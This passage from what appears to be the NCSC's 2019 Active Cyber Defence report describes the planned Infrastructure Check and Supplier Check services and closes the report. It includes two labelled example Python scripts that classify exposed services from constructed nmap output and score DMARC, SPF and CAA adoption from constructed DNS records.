The Infrastructure Check service vision is to develop a free, web-based portal where public sector users will supply details of their internet facing systems and schedule regular vulnerability scans. The results of these scans will identify weaknesses on internet exposed infrastructure, identifying misconfiguration and poor patch management processes, and help drive behavioural change such that weaknesses are removed, resulting in a reduction in overall cyber risk. This is an obvious extension of the Web Check service and the target audience will be similar. Infrastructure Check will concentrate on services exposed over TCP/IP and UDP/IP to start with. We'll be checking for lots of different exposed services, including the most obvious such as

• remote access VPN services (e.g. IPSec, TLS)

• remote desktop services (e.g. RDP, VNC)

• remote management services (e.g. Telnet, SSH)

• IP-based voice/video services (e.g. SIP)

• ‘network infrastructure’ services (e.g. routing protocols, management protocols)

• file sharing services (e.g. FTP, SMB)

A user will be able to better understand the exposure of their critical services to the internet and take action, guided by NCSC, to make things more secure. We also hope to be able to identify common misconfigurations and out of date implementations and proactively inform customers. Infrastructure Check is currently in Discovery and will be moving forward to Alpha in 2019. We have not decided on a delivery model yet and we may end up using existing industry services as a basis for this.
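The following Python is an added example, not NCSC or Infrastructure Check code (the service was still in Discovery when this was written and no scanner or criteria are described on this page). It shows the step between "scan results" and "a report the customer can act on": parsing nmap's grepable (-oG) output for a constructed scan of three hosts, classifying open ports into the service classes listed above, attaching a severity, and flagging a version banner that looks out of date. The service-class table, the severities and the "OpenSSH older than 7.0 is out of date" rule are illustrative assumptions for the example, not NCSC's criteria.

```python
"""Turning scanner output into findings. Added example for this page, not NCSC
code. Parses nmap grepable (-oG) lines of the form
  Host: <ip> (<name>)<TAB>Ports: port/state/proto/owner/service/rpc/version/, ...
The scan below is constructed (RFC 5737 addresses); the class table, the
severities and the OpenSSH version rule are assumptions, not NCSC criteria."""
import re

CONSTRUCTED_SCAN = (
    "# Nmap 7.70 scan initiated (constructed sample)\n"
    "Host: 203.0.113.5 (www.example.net)\tPorts: 80/open/tcp//http//nginx/, "
    "443/open/tcp//https//nginx/\tIgnored State: closed (998)\n"
    "Host: 203.0.113.6 (fw.example.net)\tPorts: 22/open/tcp//ssh//OpenSSH 5.3 (protocol 2.0)/, "
    "23/open/tcp//telnet///, 500/open/udp//isakmp///, 161/open/udp//snmp//SNMPv1 server/"
    "\tIgnored State: closed (996)\n"
    "Host: 203.0.113.7 (files.example.net)\tPorts: 445/open/tcp//microsoft-ds//"
    "Windows Server 2008 R2 microsoft-ds/, 3389/open/tcp//ms-wbt-server//Microsoft Terminal Services/, "
    "21/filtered/tcp//ftp///\tIgnored State: closed (997)\n"
)

HOST_RE = re.compile(r"^Host:\s+(\S+)\s+\(([^)]*)\)\s+Ports:\s+([^\t]*)")
OPENSSH_RE = re.compile(r"OpenSSH[_ ](\d+)\.(\d+)")

# nmap service name -> class from the list in the text (assumed mapping).
SERVICE_CLASS = {
    "isakmp": "remote access VPN", "pptp": "remote access VPN",
    "ms-wbt-server": "remote desktop", "vnc": "remote desktop",
    "telnet": "remote management", "ssh": "remote management",
    "sip": "IP-based voice/video",
    "snmp": "network infrastructure", "bgp": "network infrastructure",
    "ftp": "file sharing", "microsoft-ds": "file sharing", "nfs": "file sharing",
}
# Illustrative severities: cleartext or historically abused services are 'high'.
SEVERITY = {"telnet": "high", "snmp": "high", "microsoft-ds": "high",
            "ms-wbt-server": "high", "vnc": "high", "nfs": "high"}


def parse_grepable(text):
    """Return [{'ip', 'name', 'ports': [{'port','state','proto','service','version'}]}]."""
    hosts = []
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if not m:
            continue
        ip, name, ports = m.groups()
        entries = []
        for p in ports.split(", "):
            f = p.strip().split("/")   # port/state/proto/owner/service/rpc/version/
            if len(f) < 7:
                continue
            entries.append({"port": int(f[0]), "state": f[1], "proto": f[2],
                            "service": f[4], "version": f[6]})
        hosts.append({"ip": ip, "name": name, "ports": entries})
    return hosts


def assess(hosts):
    """Findings for open ports in a known class, highest severity first."""
    findings = []
    for h in hosts:
        for p in h["ports"]:
            if p["state"] != "open":
                continue
            cls = SERVICE_CLASS.get(p["service"])
            if cls is None:
                continue
            sev, notes = SEVERITY.get(p["service"], "medium"), []
            m = OPENSSH_RE.search(p["version"])
            if m and (int(m.group(1)), int(m.group(2))) < (7, 0):
                notes.append("outdated OpenSSH")     # assumed threshold for the example
                sev = "high"
            findings.append({"host": h["ip"], "name": h["name"], "port": p["port"],
                             "proto": p["proto"], "service": p["service"],
                             "class": cls, "severity": sev, "notes": notes})
    return sorted(findings, key=lambda f: (f["severity"] != "high", f["host"], f["port"]))


def report(text):
    return assess(parse_grepable(text))


if __name__ == "__main__":
    for f in report(CONSTRUCTED_SCAN):
        print(f"{f['severity']:6} {f['host']:12} {f['port']:>5}/{f['proto']} "
              f"{f['service']:14} {f['class']} {' '.join(f['notes'])}")
```

Filtered ports (the FTP entry) are deliberately not reported: a scan can only say that something sits in front of the port, and reporting it as exposed would train users to ignore the output. The web server on .5 produces no finding because HTTP and HTTPS are what Web Check already covers.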

12.5 Supplier Check

The Supplier Check service will use passive techniques to discover the public-facing IT footprint of suppliers to government and then perform analytics to identify relevant security and configuration information. We want to use this to see if we can infer supply chain risk from analysis of the configuration of the public-facing infrastructure of those suppliers. Obviously, this will be very open to interpretation and potentially open to being gamed by suppliers, but it may be a useful set of data as part of a wider understanding of supply chain risk.

The automated solution is specifically designed to rely on proprietary analysis of an organisation's public, internet-facing footprint (e.g. web and application servers, DNS, and email). Again, this assumes that the effort put into configuration of their publicly visible security protocols is a proxy for an organisation's more general view of security. Intuitively, this doesn't seem dumb, but we'll be looking for the data to prove or disprove this. We expect the pilot to run from March to the end of August 2019.
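The same public DNS data serves both the Internet Weather Centre question in 12.3 ("what is the adoption of DMARC or Certificate Authority Authorization in the UK?") and the Supplier Check proxy described here (is a supplier's publicly visible email and DNS configuration cared for?). The following Python is an added example written for this page, not code from either service, whose implementations are not described here. It parses DMARC, SPF and CAA records for a set of domains, produces a per-domain posture and score of the kind a supplier check would use, and aggregates adoption rates of the kind a weather centre would report. The DNS answers are constructed and the scoring weights are an illustrative assumption; a real run would replace the table with live lookups of the apex TXT, _dmarc.<domain> TXT and apex CAA records.

```python
"""DMARC/SPF/CAA adoption and posture from public DNS records.
Added example for this page, not NCSC code. The DNS answers and the scoring
weights below are assumptions for illustration."""
import re

# Constructed DNS answers for five hypothetical domains (name -> record sets).
CONSTRUCTED_DNS = {
    "a.example":        {"TXT": ["v=spf1 include:_spf.a.example -all"],
                         "CAA": ['0 issue "letsencrypt.org"', '0 issuewild ";"']},
    "_dmarc.a.example": {"TXT": ["v=DMARC1; p=reject; rua=mailto:dmarc@a.example"]},
    "b.example":        {"TXT": ["v=spf1 ip4:192.0.2.0/24 ~all", "some-verification=abc"]},
    "_dmarc.b.example": {"TXT": ["v=DMARC1; p=none; rua=mailto:reports@b.example"]},
    "c.example":        {"TXT": ["v=spf1 mx -all"]},
    "d.example":        {"CAA": ['0 issue "digicert.com"', '0 iodef "mailto:caa@d.example"']},
    "_dmarc.d.example": {"TXT": ["v=DMARC1; p=quarantine; pct=100"]},
    "e.example":        {},
}

CAA_RE = re.compile(r'^(\d+)\s+(issue|issuewild|iodef)\s+"([^"]*)"$')


def parse_dmarc(txt_records):
    """Tag dict of the first valid DMARC record (must carry 'p'), else None."""
    for txt in txt_records:
        if not txt.lower().startswith("v=dmarc1"):
            continue
        tags = {}
        for part in txt.split(";"):
            if "=" in part:
                k, v = part.split("=", 1)
                tags[k.strip().lower()] = v.strip()
        if "p" in tags:
            return tags
    return None


def parse_spf(txt_records):
    """Qualifier of the SPF 'all' term ('-' fail, '~' softfail, '?' neutral,
    '+' pass); '?' if the record has no 'all' term; None if there is no SPF."""
    for txt in txt_records:
        if txt.lower().startswith("v=spf1"):
            for term in txt.split()[1:]:
                if term.lower().lstrip("+-~?") == "all":
                    return term[0] if term[0] in "-~?+" else "+"
            return "?"
    return None


def parse_caa(caa_records):
    """(issuers, has_iodef) from CAA records; an issuer of ';' means nobody."""
    issuers, has_iodef = [], False
    for rec in caa_records:
        m = CAA_RE.match(rec.strip())
        if not m:
            continue
        _flags, tag, value = m.groups()
        if tag in ("issue", "issuewild"):
            issuers.append(value)
        else:
            has_iodef = True
    return issuers, has_iodef


def posture(domain, dns=CONSTRUCTED_DNS):
    """One domain's email and certificate controls with a 0-6 score
    (weights are an illustrative assumption, not an NCSC scheme)."""
    apex = dns.get(domain, {})
    dmarc = parse_dmarc(dns.get("_dmarc." + domain, {}).get("TXT", []))
    spf_all = parse_spf(apex.get("TXT", []))
    issuers, _ = parse_caa(apex.get("CAA", []))
    p = dmarc["p"].lower() if dmarc else None
    score = {"reject": 3, "quarantine": 2, "none": 1}.get(p, 0)
    score += {"-": 2, "~": 1}.get(spf_all, 0)
    score += 1 if issuers else 0
    return {"domain": domain, "dmarc_policy": p, "spf_all": spf_all,
            "caa": bool(issuers), "score": score}


def measure_adoption(domains, dns=CONSTRUCTED_DNS):
    """Fraction of domains with each control (the aggregate a weather centre
    wants) next to the per-domain rows a supplier check wants."""
    rows = [posture(d, dns) for d in domains]
    n = len(rows)
    return {
        "dmarc_any": sum(r["dmarc_policy"] is not None for r in rows) / n,
        "dmarc_enforcing": sum(r["dmarc_policy"] in ("quarantine", "reject") for r in rows) / n,
        "spf_any": sum(r["spf_all"] is not None for r in rows) / n,
        "caa": sum(r["caa"] for r in rows) / n,
        "per_domain": rows,
    }


if __name__ == "__main__":
    import json
    print(json.dumps(measure_adoption(sorted(d for d in CONSTRUCTED_DNS
                                             if not d.startswith("_dmarc."))), indent=2))
```

Separating "DMARC present" from "DMARC enforcing" matters for the adoption question: a p=none record only asks for reports and blocks nothing, so counting it as adoption overstates protection. The per-domain score is also exactly the kind of figure the text warns can be gamed, since a supplier can publish p=reject without ever acting on the reports.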

Raw data is gathered non-intrusively from outside an organisation by performing a light web crawl, much like a search engine, and obeying robots.txt instructions, combining this with other open source and proprietary information. As such, there is no requirement for any supplier-proprietary information or access to any IT systems managed by the contracting agency or their suppliers. There is no integration with any systems containing customer records, transaction data, or sensitive data of any kind, unless they are trivially accessible from the internet[42]. We will be providing third party suppliers with a report highlighting key areas for improvement and then revisiting these after 6 months to see how much their cyber security stance has improved. It will be interesting to see if we can show objectively that the organisational security of a particular supplier (and by extension the broad supply chain risk they bring) can be inferred in this way. We're certainly not sure!

[42] This case will likely drive an early exit from the decision cycle as to whether to use a particular supplier.



13 Conclusion

In November 2016, we posited an ecosystem of relatively simple services working together to objectively and measurably make the UK safer from cyber attack. In particular, we suggested that we could begin to tackle the commodity attacks that directly affect the majority of people in the UK, focusing on affecting the return on investment these attacks attract. We wish to protect the majority of the people from the majority of the harm from the majority of the attacks the majority of the time. We are not expecting our interventions to be perfect or to defend against every single type of cyber attack. However, we continue to believe that government actively doing something, providing real services and generating real data and analysis has to be a first step in demystifying cyber security, and beginning to tackle the impacts of cyber attack at scale.

This paper, the second in what will become an annual release, has documented the work we have done with our partners in 2018 and again showed, with real, unvarnished data, the effect we are having on the security of the UK public sector and the wider UK cyber ecosystem. In some cases, we haven't managed to do as much as we hoped, but work will continue to scale these services and more importantly the effects they have, both in the UK and internationally. The year 2018 also saw an independent review of the NCSC Active Cyber Defence programme by an academic partner. This King's Policy Paper, 'Active Cyber Defence: a public good for the private sector', is available here[43].

While the Active Cyber Defence programme is still young, we believe that it has demonstrated - in a sustained way - the value of the new approach adopted by the government in the National Cyber Security Strategy. However, we are not the only organisation with good ideas and we are not the only country connected to the internet. As per last year, we would welcome partnerships with people and organisations who wish to contribute to the ACD service ecosystem, analysis of the data or contributing data or infrastructure to help us make better inferences. In 2019, we will make a concerted effort to encourage other government cyber security agencies around the world to consider the effects of our ACD programme and, if they wish, try to help them implement similar services.

We hope that the ACD programme in general and this paper and future ones like it help to better inform people, enterprises and governments about the possibilities of national scale protection through the widespread adoption of relatively simple services that are driven by evidence and data, rather than hyperbole and fear. We believe that evidence-based cyber security policy is a possibility. If you're interested in being a part of it, look on the NCSC website for opportunities to work with us either as an employee, as part of the Industry 100 scheme or even in other ways.

[43] https://www.kcl.ac.uk/policy-institute/research-analysis/active-cyber-defence



To find out more visit: ncsc.gov.uk

© Crown copyright 2019. NCSC information licensed for re-use under Open Government Licence (http://www.nationalarchives.gov.uk/doc/open-government-licence).

@NCSC National Cyber Security Centre